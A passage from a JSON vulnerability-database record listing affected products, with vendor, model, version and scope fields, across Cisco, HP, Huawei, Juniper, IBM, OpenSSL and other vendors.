"trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "clustered data ontap antivirus connector", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "oneview", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.10" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "f1000a and s family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "s7700\u0026s9700 v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.6" }, { "model": "prime access registrar appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87100" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "u200a and m family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "flex system fc5022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "850/8700" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "junos 11.4r9", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "s3900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.6" }, { "model": "ips", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "unified communications widgets click to call", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "agile controller v100r001c00spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace usm v100r001 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "softco v100r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5500t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7765" }, { "model": "videoscape anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence t series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "junos d20", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "12.1x46" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mds switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart update manager for linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3.5" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.3" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "proventia network security controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "documentum content server p07", "scope": "ne", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "hsr6602 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.4" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "wag310g wireless-g adsl2+ gateway with voip", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "project openssl g", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "telepresence tx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "security threat response manager", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.1" }, { "model": "nexus switch", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "31640" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2.2" }, { "model": "fastsetup", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "unified wireless ip phone series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "29200" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "9.5" }, { "model": "fusionsphere v100r003c10spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "msr93x family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "telepresence advanced media gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.3" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "smc2.0 v100r002c01b025sp07", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.0" }, { "model": "s2700\u0026s3700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "espace cc v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "wx5002/5004 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "ida pro", "scope": "eq", "trust": 0.3, "vendor": "hex ray", "version": "6.5" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-3" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "jabber for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "usg5000 v300r001c10sph201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "updatexpress system packs installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.61" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.4" }, { "model": "security network intrusion prevention system gx5208", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "junos 11.4r12", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "prime optical for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.0-release-p2", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "a6600 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "isoc v200r001c01", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "5000" }, { "model": "si switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "51200" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "junos 12.1x44-d40", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vsr1000 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "project openssl beta4", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "esight-ewl v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 13.3r2-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.4" }, { "model": "junos 12.1r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "10.1" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "hyperdp oceanstor n8500 v200r001c91", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "asg2000 v100r001c10sph001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "documentum content server", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "manageone v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "10.2" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "wireless lan controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart call home", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "simatic wincc oa", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "3.8" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "project openssl beta5", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.2" }, { "model": "s7700\u0026s9700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.3" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0" }, { "model": "oic v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "s6900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "spa300 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "14.1" }, { "model": "vsm v200r002c00spc503", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "ecns610 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ucs b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "junos 12.3r7", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junos 13.2r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.3" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "documentum content server sp1", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.4" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "junos 12.3r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "universal small cell series software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50003.4.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.9" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "security access manager for web appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "msr20 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "junos 12.1r9", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "s5900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 13.2r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 11.4r10-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "documentum content server p05", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "oceanstor s6800t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 12.1x46-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "jabber video for telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.5" }, { "model": "secure access control server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 12.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "junos 5.0r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "129000" }, { "model": "fortios build", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.2.0589" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.4" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "documentum content server sp2", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.10" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "hsr6800 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "jabber im for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "snapdrive for windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "project openssl 0.9.8m beta1", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "ssl vpn 7.4r11.1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.1" }, { "model": "small cell factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.99.4" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.0" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "msr20 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "manageone v100r002c10 spc320", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "svn2200 v200r001c01spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "s2750\u0026s5700\u0026s6700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.3.10" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3200" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "msr1000 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.1" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "secblade iii", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "espace vtm v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa122 ata with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "junos 10.4r", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.0" }, { "model": "junos 12.1r8-s3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network intrusion prevention system gx5208-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "junos 13.2r5", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.5" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "junos 12.1x46-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "advanced settings utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.60" }, { "model": "spa525 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "data ontap smi-s agent", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "junos 13.1r4-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "(comware family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12500v7)0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4.0.15" }, { "model": "automation stratix", "scope": "ne", "trust": 0.3, "vendor": "rockwell", "version": "590015.6.3" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.2" }, { "model": "cp1543-1", "scope": "ne", "trust": 0.3, "vendor": "siemens", "version": "1.1.25" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "secure analytics", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2013.2" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "advanced settings utility", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.52" }, { "model": "eupp v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "msr30 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "nexus series fabric extenders", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "20000" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.0" }, { "model": "security network intrusion prevention system gx6116", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.0" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "strm 2012.1r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.0" }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "telepresence mxp series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.2" }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "documentum content server p02", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "espace u2980 v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos os 12.1x47-d10", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "uma-db v2r1coospc101", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security information and event management hf6", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.2.2" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "identity service engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "jsa 2014.2r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.2" }, { "model": "telepresence exchange system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7900.00" }, { "model": "usg9300 usg9300 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s12700 v200r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "f1000e family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.4" }, { "model": "enterprise linux", 